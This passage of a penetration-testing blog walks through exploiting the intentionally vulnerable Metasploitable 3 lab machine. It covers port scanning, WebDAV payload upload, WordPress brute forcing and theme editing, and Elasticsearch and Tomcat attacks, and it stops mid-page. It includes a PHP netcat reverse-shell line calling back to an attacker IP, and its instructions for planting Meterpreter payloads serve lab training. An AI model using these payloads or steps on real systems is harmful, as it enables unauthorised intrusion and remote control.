OUTPUT</li><li>sudo iptables --policy FORWARD</li><li>sudo iptables –F</li></ul><p><a href="https://drive.google.com/uc?id=1cVVXtJOMiTfsrjeHm3bR3huG2tKYIc0Y" target="_blank"><img width="363" height="152" title="Metasploitable 3 Ubuntu IPTables" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu IPTables" src="https://drive.google.com/uc?id=1M0JI6xPejFHjmk8Sj_s5ejVcl__W8oZW" border="0"></a></p><h2></h2><a name="more"></a><h2>Scanning and Enumerating</h2><p>The first step is to gather as much information as you can about the remote system. Use Nmap, Legion and OpenVAS to identify the open ports, running services and vulnerabilities on the target.<h3>Nmap Scan</h3><p>Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. You can run Nmap directly from the CLI but it might be a good idea to run Nmap from within Metasploit so that the results are added to the MSF database for further analysis and later use. <p>There are many scanning possibilities but the following choices of options will balance speed with accuracy. As you add more options, you might sacrifice speed in order to get better results:<ul><li><b>nmap -sS [IP Address]</b></li><li><b>nmap -sV [IP Address]</b></li><li><b>nmap -T4 -sV --version-all --osscan-guess -A [IP Address]</b></li></ul><p><b></b><p>Typical results:<p><a href="https://drive.google.com/uc?id=13pIfu36BVFAj1Eb1eNH9UZv-_yiN202N" target="_blank"><img width="806" height="438" title="Nmap scan initial results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap scan initial results" src="https://drive.google.com/uc?id=1J0irTHZNLHEsBCSoga8iBYJVRt6wmaVt" border="0"></a><p>However, the previous options won’t show you all the open ports because the <b>-sV</b> scan mode for service and version detection will use the <b>nmap-services</b> database of about 2,200 well-known services.<p>Therefore, it might be a good idea to run some scans covering wider ranges of ports:<ul><li><b>nmap -sV --osscan-guess -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]</b></li></ul><p><b></b><p>and even UDP ports:<ul><li><b>nmap -sU -sV --version-all -p 1-10000 [IP Address]</b></li></ul><p>And these are the results:<p><a href="https://drive.google.com/uc?id=1d-0_WuY1DLO0MXmiJAVc99gv9HJNokS_" target="_blank"><img width="806" height="414" title="Nmap scan final results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap scan final results" src="https://drive.google.com/uc?id=1bSgU8jdOgawGLbN27WP3yZvW3WVPWyuZ" border="0"></a><p>As you can see, there are many open ports and running services on the target VM.<h3>Legion Scan</h3><p>Another easy way to get initial information on the target is to use Legion. This tool will run a number of Nmap scans and it will also load a number of other tools and use them to get information about the target machine.<p>Some of the tools will immediately try to test the found services and even brute force the logins.<p><a href="https://drive.google.com/uc?id=1jFwupO7k8yjj6XzM7R3j0HLf42N8VrGZ" target="_blank"><img width="800" height="593" title="Metasploitable 3 Ubuntu Legion scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu Legion scan results" src="https://drive.google.com/uc?id=1J2VcYTMtRgWA4T_HE4Ahc3rRf7vABfP6" border="0"></a><p>You can save the result of this scan for later usage or for a quick reference. But for proper vulnerability scanning, you will need a better tool.<h3>OpenVAS Scan</h3><p>For a comprehensive scan, try the Open Vulnerability Assessment Scanner. This this tool has a full range of capabilities including unauthenticated testing, authenticated testing, various high level and low-level Internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test.<p>It can be installed on Kali Linux and it can be updated daily with the latest vulnerability tests.<p><a href="https://drive.google.com/uc?id=1ojtdrASaLFK-CLyRhHAR-_BI8JQXcZ-E" target="_blank"><img width="789" height="499" title="Metasploitable 3 Ubuntu OpenVAS scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu OpenVAS scan results" src="https://drive.google.com/uc?id=1Ghlnvqx9Y7YdguxtXG8uLI4ai1_M69mT" border="0"></a><p><br><p><strong>Previous post</strong>: <a title="Metasploitable 3 Windows Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part-x.html">Metasploitable 3 Windows Walkthrough: Part X</a></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-2098666791902952872020-11-06T02:37:00.000-08:002020-11-21T04:26:53.791-08:00Metasploitable 3 Windows Walkthrough: Part X<h2>Exploiting Port 8585 – WebDAV</h2><p>There are multiple services running on this single port. <p><a href="https://drive.google.com/uc?id=1FTArITFLOtEhTQ3CeANQ9cUzE6DDk8rv" target="_blank"><img width="552" height="499" title="Services running on Metasploitable 3 port 8585" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Services running on Metasploitable 3 port 8585" src="https://drive.google.com/uc?id=13W7rDDiKZpWKZAMjXxIGf_enxpyDrj2C" border="0"></a><p>Web Distributed Authoring and Versioning is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. In Metasploitable3, the <b><em>uploads</em></b> directory looks promising and for now it is completely empty:</p><p><a href="https://drive.google.com/uc?id=1Y_vvfYn8POPznFrv1h0KEif3R_O2vO13" target="_blank"><img width="499" height="240" title="The uploads directory" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The uploads directory" src="https://drive.google.com/uc?id=1v0nlsd6DMqqm6uJsKwubDO-ZC2ubv9cR" border="0"></a><h4><a name="_Toc52385217"></a></h4><a name="more"></a><h3>Enumerating WebDAV using Directory Buster</h3><p>Directory Buster (dirb) is a nice tool that brute forces directories on a webserver. <p><a href="https://drive.google.com/uc?id=1rHlLr_RlTUd_orwT1-NjDZ2wl_33X-IA" target="_blank"><img width="512" height="121" title="Enumerating with dirb" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with dirb" src="https://drive.google.com/uc?id=1n9bchtME53vfg0WKi9WFDMKL1pfVc7MH" border="0"></a><p><a href="https://drive.google.com/uc?id=1maWBtfelPsxygV1IR7TPwIZ4CloCrSz2" target="_blank"><img width="516" height="68" title="Enumerating with dirb" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with dirb" src="https://drive.google.com/uc?id=1AC-gJl_ossx-PjfUr-5R89wvAVy_xril" border="0"></a><p>Now you can use several methods to determine if you’re allowed to upload files to this directory with the HTTP PUT method<h3>Enumerating WebDAV using Nmap</h3><p><a href="https://drive.google.com/uc?id=1gl3pT6Db6eLpu06gQdlFVhRCZoSj_ITo" target="_blank"><img width="806" height="263" title="Enumerating with nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with nmap" src="https://drive.google.com/uc?id=1t_KxZ8XjbNMdmK6zQ4Lqf3GosczDouIh" border="0"></a></p><p><a href="https://drive.google.com/uc?id=1C0Y2OmKD7XuJE1MmEvPNN2czsa5OgXrt" target="_blank"><img width="806" height="237" title="Enumerating with nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with nmap" src="https://drive.google.com/uc?id=1TPBoufD8B34phW1RuPosSERfJwbt5CyM" border="0"></a><p>As you can see, the webserver allows you to upload files to the uploads directory and even delete files.<h3>Enumerating WebDAV using Nikto</h3><p>You can also use this web vulnerability scanner to identify features in the webserver. If the <strong><em>HTTP PUT</em></strong> method is enabled than Nikto will indicate this as following:<p><a href="https://drive.google.com/uc?id=1fiPMyxXL20nmTBQm0-sfWpxgmoNnVBe6" target="_blank"><img width="806" height="339" title="Enumerating with Nikto" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with Nikto" src="https://drive.google.com/uc?id=179J21w-kvFtDu9V5h-2SB_gwrk14CFdy" border="0"></a><p>The last line of Nikto output indicates that the uploads directories allows uploading files using HTTP PUT.<h3>Enumerating WebDAV using Metasploit</h3><p>Using Metasploit you can also do WebDav Enumeration.</p><p><a href="https://drive.google.com/uc?id=1e9jdixcHu5RSa_oo1AVAuY-9oqbekQlu" target="_blank"><img width="806" height="326" title="Enumerating WebDAV with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating WebDAV with Metasploit" src="https://drive.google.com/uc?id=1G2b0X6D6UZo4DLv-Np0BlYBNaOsF75bz" border="0"></a><p>As you can see, the <b><em>uploads</em></b> directory is writable and a number of different file formats can be uploaded over there.<h3>Exploiting WebDAV</h3><h4>Uploading a payload to WebDAV</h4><p>Now that you know that you can upload files to the server, the next step is creating a Meterpreter PHP reverse shell script to be deployed to the webserver. Create the scripts with these parameters:<ul><li>Kali IP: 172.16.1.6</li><li>Kali port: 5555</li></ul><p><a href="https://drive.google.com/uc?id=156y8Pr8oH8x-dUrZrKmoPV0NQnQlgL63" target="_blank"><img width="806" height="125" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a payload with msfvenom" src="https://drive.google.com/uc?id=11r58_RleAlEsjE8CQfaZ0C8YkJBVKrqV" border="0"></a></p><p>Now setup a listener to receive the incoming connection choosing the correct payload:<p><a href="https://drive.google.com/uc?id=177dt-aQCtUtGBjkPVw4wImvRpxJrYbC0" target="_blank"><img width="806" height="197" title="Starting a Metasploit listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener" src="https://drive.google.com/uc?id=1YW1eU-PO4PSuGGJK6H1EFIZelgfI8x6D" border="0"></a><p>Now you have multiple options to deploy the payload to the target machine.<h4>Exploiting WebDAV using Nmap</h4><p>Nmap has a script created exactly to take advantage of the HTTP PUT method. Because port 8585 is not defined as an HTTP service port in the Nmap services file it is fundamental that you run a service scan with the <em><strong>-sV</strong></em> flag. Otherwise, the script will fail in uploading the file and will only display an open port and unknown service.<p><a href="https://drive.google.com/uc?id=1zLpngTRbspukan9H5CsIXkLEznvJo8ki" target="_blank"><img width="806" height="233" title="Uploading the payload with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with Nmap" src="https://drive.google.com/uc?id=1R088PIHDH0NxfK7SuHiItAHAFJ58JN4k" border="0"></a><p>Now, if you browse the uploads directory and click on the payload.php file you will get a meterpreter shell:<p><a href="https://drive.google.com/uc?id=1o-W-9QcqUN6P9oHNebkyVsxs5PDQvJ74" target="_blank"><img width="439" height="216" title="Executing the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the payload" src="https://drive.google.com/uc?id=1tGu2kG56GU9LMQ7zb0-Pns_VztdSb7wY" border="0"></a><p><a href="https://drive.google.com/uc?id=1bra-AaxPgNWjDDU0WWzd1Ttn-rBqz-nv" target="_blank"><img width="806" height="108" title="Meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter shell" src="https://drive.google.com/uc?id=1aWb2UK2nl4qLUakxNL89HHNrQqeg8oHT" border="0"></a><p>This is low privilege shell, but it’s a start.<p>Before you try some other deployment methods, close the meterpreter session and remove the previous payload from the WebDAV server using <b>curl</b>:<p><a href="https://drive.google.com/uc?id=1paRmlCTdP-jGCmGfzf9tZjjnvubsE4-F" target="_blank"><img width="765" height="86" title="Deleting the payload with curl" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deleting the payload with curl" src="https://drive.google.com/uc?id=1c87NQ0okoRmjHa_1ZmwCVL482I7dBfdD" border="0"></a><h4>Exploiting WebDAV using Metasploit</h4><p>You can also use the Metasploit auxiliary module HTTP PUT to upload a file to the <b><em>uploads</em></b> web directory. Use the previously created payload:<p><a href="https://drive.google.com/uc?id=1M3WbbWTL6ST_TqUfmiUo-ctIFUCEXiK-" target="_blank"><img width="806" height="394" title="Uploading the payload with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with Metasploit" src="https://drive.google.com/uc?id=1LwPVKtfTfLLzvV3aQJ7GZKCFovFQCS2Y" border="0"></a><p>Metasploit is showing us that the upload has failed, but when we check the uploads directory on the webserver we can see that the file upload did go through.<p><a href="https://drive.google.com/uc?id=1zZkAdtmH6Bnf1nlgoWaV1ur7_to70lvK" target="_blank"><img width="427" height="185" title="Executing the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the payload" src="https://drive.google.com/uc?id=1X1sUu-6s1CqiV0m4AeiXAWIC9RtTb6kT" border="0"></a><p>Setup the same listener as before and repeat the same procedure of browsing and clicking the payload on the target server.<p><a href="https://drive.google.com/uc?id=1jLl9aXtWVYv_DBh4nwQmxAkCvM1y_JVh" target="_blank"><img width="806" height="211" title="Meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter shell" src="https://drive.google.com/uc?id=147B4w5RwLLj8F_cXRU-Z-lyM01rHrN_2" border="0"></a><h4>Exploiting WebDAV using curl</h4><p>You can also upload the payload using <b><em>curl</em></b>:<h5><a href="https://drive.google.com/uc?id=1o9Dkc67RfCKzzkb4HGk8BXfm3CXAbiCw" target="_blank"><img width="806" height="194" title="Uploading the payload with curl" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with curl" src="https://drive.google.com/uc?id=1x7I-Sp91i-nJdvcnxfRT0aWJrX0RHCCf" border="0"></a></h5><h4>Exploiting WebDAV using cadaver</h4><p>Finally, you can also use <b>cadaver</b> to upload the file:<p><a href="https://drive.google.com/uc?id=1qeNmjhCKHQQL5sVSrX5WChFpxcA_1t22" target="_blank"><img width="806" height="131" title="Uploading the payload with cadaver" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload with cadaver" src="https://drive.google.com/uc?id=1aEMR5sYrgnSM9p3AzNOETODF3V9xPwUk" border="0"></a><h2>Exploiting Port 8585 – Wordpress</h2><p>From the start page, if you click on the <b><em>wordpress</em></b> link under <b><em>Your Projects</em></b> you will see the WordPress website running on the target server.<h4><a href="https://drive.google.com/uc?id=1R29UPsNB0k2U_cJZLp-u8w0QIRK1Z1OQ" target="_blank"><img width="525" height="407" title="Metasploitable 3 Wordpress website" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Wordpress website" src="https://drive.google.com/uc?id=11_GOwt8ymy8WcO7WnzH09JnI7zFkcsnQ" border="0"></a></h4><p>The link to the login page will take you to <b><em>/wordpress/wp-login.php</em></b></p><p><a href="https://drive.google.com/uc?id=1EYj7j0u237Z2lrwDSHBvYHdRMH13RZuM" target="_blank"><img width="558" height="499" title="Wordpress login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Wordpress login page" src="https://drive.google.com/uc?id=1hpeBr-D8IJYOCThKfhl7Q7jmboa1fNOW" border="0"></a><p>You already have the credentials because you’ve managed to crack the hashes before, remember? Anyway, forget about that and try to get them again.<h3>Brute forcing Wordpress using Nmap</h3><p>Use your customized wordlists to speed up the process<p><a href="https://drive.google.com/uc?id=1JZOoEiFhzv7p6RnB0N_gfGM9TFpupIR9" target="_blank"><img width="806" height="284" title="Brute forcing Wordpress with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Wordpress with Nmap" src="https://drive.google.com/uc?id=1lEticusNm21t469dLlcIRdigoWsnA6tg" border="0"></a><p>You have found four valid sets of credentials.<h3>Brute forcing Wordpress using Metasploit</h3><p><a href="https://drive.google.com/uc?id=1grvjrKNb_v80-4p5D7q3POKaXEJ9DNVx" target="_blank"><img width="806" height="411" title="Brute forcing Wordpress with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Wordpress with Metasploit" src="https://drive.google.com/uc?id=1wr8qYfurX2h5FLxqqZSHjxlrc3iOjPvs" border="0"></a></p><h3>Brute forcing Wordpress using WPScan</h3><p><b>WPscan</b> is a powerful tool that can also be used to brute force the access to a WordPress website:<p><a href="https://drive.google.com/uc?id=1OnSw0aazOPbdZ77Ct0yiOA5hLmA2j4G7" target="_blank"><img width="806" height="277" title="Brute forcing Wordpress with WPscan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Wordpress with WPscan" src="https://drive.google.com/uc?id=1oDDzqMGom_T5-lHDw8FSkdHDPOwn-F5G" border="0"></a><p><a href="https://drive.google.com/uc?id=1iQrwmaPll1UVsKxkD04zKWtBee1ydLg9" target="_blank"><img width="806" height="180" title="Brute forcing Wordpress with WPscan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Wordpress with WPscan" src="https://drive.google.com/uc?id=1vmLonN3J4VjHj6TxlJH2Am55K5ovcuil" border="0"></a><p>Now, with a valid login you can access the admin page:<p><a href="https://drive.google.com/uc?id=19qd9TFTlAsWOw38ZWkVs7X38QQErS0pW" target="_blank"><img width="692" height="290" title="Wordpress admin page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Wordpress admin page" src="https://drive.google.com/uc?id=1ixaaG4yXsyettPsdPUBuwL4yBMKDgFNp" border="0"></a><p>Try to get as much information as possible about your target:</p><h3>Enumerating Wordpress using Nmap</h3><p><a href="https://drive.google.com/uc?id=1iJ960Khq4CP9Zao06YHgXp7DeIK21nLw" target="_blank"><img width="806" height="298" title="Enumerating Wordpress with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Wordpress with Nmap" src="https://drive.google.com/uc?id=1v4Ss5HoHPOdOac14OWVimJ2tD-vpjLWp" border="0"></a></p><p>Important information: the installed plugins…<p><a href="https://drive.google.com/uc?id=10cb20Ub_j7cXS-Fzc3oiRiU-IlqIJlem" target="_blank"><img width="806" height="256" title="Enumerating Wordpress with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Wordpress with Nmap" src="https://drive.google.com/uc?id=1iCQm1tDGJ3FEyEYtNbsM6lR8n9YSQjIF" border="0"></a><p><b><em>NOTE</em></b>: Pay attention to the syntax of the NSE scripts. <h3>Enumerating Wordpress using WPScan</h3><p>This is supposed to be the ultimate tool when it comes to getting information about any WordPress site:<p><a href="https://drive.google.com/uc?id=1-TazS9stWsapD3tt5LB3NJZaYAe7GdU7" target="_blank"><img width="806" height="52" title="Enumerating Wordpress with WPscan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Wordpress with WPscan" src="https://drive.google.com/uc?id=1Yvuc7Vifw7A0uu-KS_M1iupGt7lL0sme" border="0"></a><p><a href="https://drive.google.com/uc?id=1RDWtV-PC4S1-lte3j45-VIB_WKgT_IOX" target="_blank"><img width="806" height="83" title="Enumerating Wordpress with WPscan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Wordpress with WPscan" src="https://drive.google.com/uc?id=1I5RgKCoKi11pAC_SmfYJqryIQDveXjtH" border="0"></a><h3>Enumerating Wordpress using Metasploit</h3><p>This module will enumerate the existing users and then it will check for valid credentials.<p><a href="https://drive.google.com/uc?id=12v8m8YHtplUH3bPH9nagaDWdjwvMWeNB" target="_blank"><img width="816" height="683" title="Enumerating Wordpress with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Wordpress with Metasploit" src="https://drive.google.com/uc?id=1x4JQGMGKOoW_7Dy2hnOGcs4Wg1eJVrjp" border="0"></a><h3>Exploiting Wordpress</h3><p>You can login to the website but what you want is a shell, right? In WordPress you can’t deploy files to the website but you can add code to the existing pages. <p>Login to WordPress either using <b><em>admin/sploit</em></b> or <b><em>vagrant/vagrant</em></b> and open the <b><em>Appearance > Editor</em></b><p><a href="https://drive.google.com/uc?id=1GrCO_tQIUs20omRDutFAZH3P51KiZWFx" target="_blank"><img width="681" height="499" title="Accessing the Wordpress Editor" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Wordpress Editor" src="https://drive.google.com/uc?id=1gG9uBmWYAZ8jTyVqcW29p8vP4KpoAC3e" border="0"></a><p>On the right side, select a PHP file preferably <b><em>header.php</em></b>.<p><a href="https://drive.google.com/uc?id=1xnXUMKMD6kahcbLQ_5Lj2hpZQalzFmlV" target="_blank"><img width="368" height="445" title="Selecting the header.php script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting the header.php script" src="https://drive.google.com/uc?id=1jm7UgkO5pVPcTLLIkCSBqfSN40zxDWlN" border="0"></a><p>You will see the PHP code for that page:<p><a href="https://drive.google.com/uc?id=1qrfPtGS-dvAkU9ZittHiYvAMuAZyI2t7" target="_blank"><img width="656" height="145" title="Header.php code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Header.php code" src="https://drive.google.com/uc?id=1gBd0z3LUKkPNx2ftNi2OFFY4VqtH974t" border="0"></a><h4>Exploiting Wordpress using Metasploit</h4><p>To open a meterpreter shell, create a proper payload wit MSFVenom:</p><p><a href="https://drive.google.com/uc?id=1lp9uKxDaiT90uJQEGzNSKdmZ4L4e8JnT" target="_blank"><img width="806" height="114" title="Creating a payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a payload" src="https://drive.google.com/uc?id=1TUjrUzThUnf9zzfQ-P5Sq0SW78y5ts65" border="0"></a><p>Open the generated payload and adjust the code uncommenting the beginning and adding the proper closing PHP tag at the end:<p><a href="https://drive.google.com/uc?id=1oLIjE_rJ1l4hAf-Zwnio9mUHPUg0G--2" target="_blank"><img width="778" height="285" title="Adjusting the payload's PHP code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Adjusting the payload's PHP code" src="https://drive.google.com/uc?id=1GMZZlEJ7tg1hcMPwxwqWsfb7Ob1SnBBm" border="0"></a><p>Now insert this code at the top of the <b><em>header.php</em></b> code editor:<p><a href="https://drive.google.com/uc?id=1lSCZH3lp-SrfY5U4a0UKLYDigUEHr518" target="_blank"><img width="761" height="568" title="Inserting the payload code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Inserting the payload code" src="https://drive.google.com/uc?id=1jUiTaNZjWpiv3KEPQgf0_0mCY88f3_YX" border="0"></a><p>Press the <b><em>Update File</em></b> button<p><a href="https://drive.google.com/uc?id=1toIwp3pmYwcd-R2UtaxxjzE8oBiWQaKK" target="_blank"><img width="413" height="163" title="Saving the altered code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Saving the altered code" src="https://drive.google.com/uc?id=13Wiuzt7YoyWtcNCfOW0pP9obVdwdg5Vg" border="0"></a><p>Now, setup a listener on the Kali machine, ready to receive the incoming connection:<p><a href="https://drive.google.com/uc?id=138N-G47zUiuAN_-sSJqrM9BrVeJ22Rit" target="_blank"><img width="806" height="183" title="Starting a Metasploit listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener" src="https://drive.google.com/uc?id=1v3XgZWZs717rCGna7xqxUc1OtCuYn0Uc" border="0"></a><p>Go back to your browser and reload the WordPress homepage:<p><a href="https://drive.google.com/uc?id=18sRTA9oVtYrGerEjf6Xw-6Q4x2ZoTFAY" target="_blank"><img width="569" height="147" title="Reloading the Worpress page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Reloading the Worpress page" src="https://drive.google.com/uc?id=1jEBCMIcIkb9ifdgDV6Z6rvlAaSjJkJ4g" border="0"></a><p>And you have a shell to the target machine<p><a href="https://drive.google.com/uc?id=1Cu_N21NT7a9k8Dq6YjKjNZIjnFATBAdK" target="_blank"><img width="806" height="106" title="Meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter shell" src="https://drive.google.com/uc?id=1CjpVv9sVikkc80CBXYmVIe0zro2_nPp8" border="0"></a></p><h4>Enumerating Wordpress using Netcat</h4><p>If the target machine has Netcat or a similar tool installed, it can be used to open a simple reverse shell. <p>Add the following code to the page, using Kali’s IP and listener port:<p><strong><em><?php echo shell_exec(“nc.exe 172.16.1.6 5555 -e cmd.exe”); ?></em></strong><p><a href="https://drive.google.com/uc?id=1pvjQR5nl7HljKTgJF1hojDDJGnXMOB6I" target="_blank"><img width="663" height="181" title="Adding the command to open a reverse shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Adding the command to open a reverse shell" src="https://drive.google.com/uc?id=1TuiktFLDqzoOe7E9tXpUh5RpBB_Gjqag" border="0"></a><p>Press the <b><em>Update File</em></b> button<p><a href="https://drive.google.com/uc?id=1nGmMqrNEb6mtxhjssNQMTmgKCt85IGF-" target="_blank"><img width="413" height="163" title="Saving the altered code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Saving the altered code" src="https://drive.google.com/uc?id=1sjEz46gu5aiUVf1M1Noi35f1fNN0IczD" border="0"></a><p>Now setup a Netcat listener on Kali:<p><a href="https://drive.google.com/uc?id=14VkyUUI0-mM43AelBc_ubV6p6aPt__Zc" target="_blank"><img width="502" height="105" title="Starting a Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Netcat listener" src="https://drive.google.com/uc?id=1mEjz-hRZwvqTSfEZqwq4CZzz5qT4w7gN" border="0"></a><p>Now, reloading the WordPress homepage on the browser will run the Netcat or clone command and a reverse connection to Kali will be created.<h2>Exploiting Port 9200 – Elastic Search</h2><p>Elasticsearch is a real-time distributed and open source full-text search and analytics engine and is known to have a couple of Remote Code Execution vulnerabilities. Start by accessing Metasploitable3’s IP address over port 9200:<p><a href="https://drive.google.com/uc?id=14uGfjoPL25BTNTieIKnl6-bIBBj2Wkg0" target="_blank"><img width="573" height="402" title="Elastic Search start page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Elastic Search start page" src="https://drive.google.com/uc?id=1yzfhuToejHI5zjA3c46iduLCs1ptnhCo" border="0"></a><h3>Enumerating Elastic Search using Metasploit</h3><p>There is a Metasploit module to get information about the service:<p><a href="https://drive.google.com/uc?id=10mSTStBXwMZovsaI5E9voD-ZSubgcVzY" target="_blank"><img width="806" height="172" title="Enumerating Elastic Search with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Elastic Search with Metasploit" src="https://drive.google.com/uc?id=1AG7m0QQUAwbv_t6eJkB0QVMqjSrHe5Gr" border="0"></a><p>You can even get files from the target machine:<p><a href="https://drive.google.com/uc?id=1c7cjAOHLfAqRoWhHn1rDIURH5C6QT1au" target="_blank"><img width="806" height="161" title="Enumerating Elastic Search with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Elastic Search with Metasploit" src="https://drive.google.com/uc?id=1zRHw5dfGyxUGuUT-O8qUVBH9BNOEAwsj" border="0"></a><h3>Exploiting using Metasploit</h3><p>Metasploit also has a module to exploit a vulnerability present in this version (1.1.1) of the service:<p><a href="https://drive.google.com/uc?id=1BSidyDrYq3nJucCitu8s1ykSRw7nq1YU" target="_blank"><img width="806" height="285" title="Exploiting Elastic Search with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Elastic Search with Metasploit" src="https://drive.google.com/uc?id=1pCDg_rGjNUhDRPJXkurFLQmP-ri4OAqP" border="0"></a></p><p><br></p><p><p><strong></strong></p><strong>Next post</strong>: <a title="Metasploitable 3 Ubuntu Walkthrough: Part I" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough.html">Metasploitable 3 Ubuntu Walkthrough: Part I</a>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-80307385975890396802020-11-05T15:25:00.000-08:002020-11-21T04:25:09.334-08:00Metasploitable 3 Windows Walkthrough: Part IX<h2>Exploiting Port 8282 – Apache Tomcat</h2><p>Apache Tomcat provides software to run Java applets in the browser. Coyote is a stand-alone web server that provides servlets to Tomcat applets. That is, it functions like the Apache web server, but for Java Server Pages (JSP). All this means is, web pages accessed through port 8282 will be assembled by a Java web application. <p>There are many Metasploit modules available for Tomcat so you should focus on your goals:<ul><li>Survey the website</li><ul><li>Exploit possible vulnerable pages</li></ul><li>Obtain credentials</li><li>Deploy payload</li></ul><p><a href="https://drive.google.com/uc?id=1HZmudnUURfFdIAVJwOCfNmmUXeCdKS90" target="_blank"><img width="806" height="322" title="Apache Tomcat entry page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Apache Tomcat entry page" src="https://drive.google.com/uc?id=1AfGivFGieqL5p6hgCR29Qj6WnL39OZ2y" border="0"></a></p><p>A web service like this might have multiple entry points and multiple valid credentials</p><h4><a name="_Toc52385199"></a></h4><a name="more"></a><h3>Surveying Apache Tomcat using Metasploit</h3><p>Apart from the initial page, there might be other interesting pages with other points of entry:<p><a href="https://drive.google.com/uc?id=1CwHgg3W6HUTZ80d2ipCJIs_ZOdKMcn-I" target="_blank"><img width="806" height="216" title="Surveying Apache Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Surveying Apache Tomcat with Metasploit" src="https://drive.google.com/uc?id=1-AGy_QTEEc5O4IEF1mYdxYvApZtB2FPE" border="0"></a><p>These turn up some interesting pages that can potentially be exploited, namely the<strong><em> /manager</em></strong> and the <b>/<em>axis2.</em></b><h3>Brute forcing Apache Tomcat using Metasploit</h3><p>Try to brute force your way in using the Metasploit module:<p><a href="https://drive.google.com/uc?id=1HWEgFXyUTZ40agO65Ez86uZMl6a7gHJI" target="_blank"><img width="806" height="159" title="Brute forcing Apache Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Apache Tomcat with Metasploit" src="https://drive.google.com/uc?id=1oNBj_yUHROdrlnWV5tbn0DYhNaDRyXtM" border="0"></a><p>The Tomcat credentials are not the default ones. Therefore, you must try something else. <p>Try to login to the Manager App<p><a href="https://drive.google.com/uc?id=1xGy2Y86t00cWgkZSzUpZ3rfEbkjc48J4" target="_blank"><img width="806" height="187" title="Accessing the Tomcat Manager App" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Tomcat Manager App" 